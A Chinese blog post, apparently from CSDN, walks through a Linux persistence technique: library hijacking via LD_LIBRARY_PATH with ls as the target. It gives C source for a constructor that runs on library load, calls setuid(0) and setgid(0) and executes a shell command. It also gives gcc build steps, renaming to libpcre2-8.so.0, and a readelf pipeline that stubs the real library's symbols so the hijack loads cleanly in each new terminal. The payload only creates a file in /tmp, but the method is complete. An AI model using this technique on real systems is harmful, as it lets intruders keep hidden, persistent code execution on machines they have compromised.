以 ls 为例制作 LD_LIBRARY_PATH 权限维持

本文介绍了如何在.zshrc文件中使用C语言的构造函数`hijack`实现代码注入,通过设置uid和gid以及动态链接库的方法,使得每次新开终端时都会执行特定的系统操作。后续步骤涉及修改so文件和编译过程以确保代码正常运行。
摘要由CSDN通过智能技术生成

以 ls 为例做实验

.zshrc 每打开一个终端就会执行,将下面的内容写入到 .zshrc 中。

编译此代码

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h> // for setuid/setgid

static void hijack() __attribute__((constructor));
void hijack() {

	setuid(0);
	setgid(0);
	printf("HIJACKING...\n");
	system("touch /tmp/hijack1");
}

gcc -Wall -fPIC -c -o hijack.o hijack.c
gcc -shared -o hijack.so hijack.o
mv hijack.so libpcre2-8.so.0

此时新建一个终端会报错

为了使 so 文件中的代码正常执行。
只需要将 readelf -s --wide /lib/x86_64-linux-gnu/libpcre2-8.so.0 | grep pcre2_ | awk '{print $8}' | sed 's/^/int /' | sed 's/$/;/' 结果复制到 hijack.c 中,再次编译。

此时在打开一个新的终端就会执行 so 中的代码。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值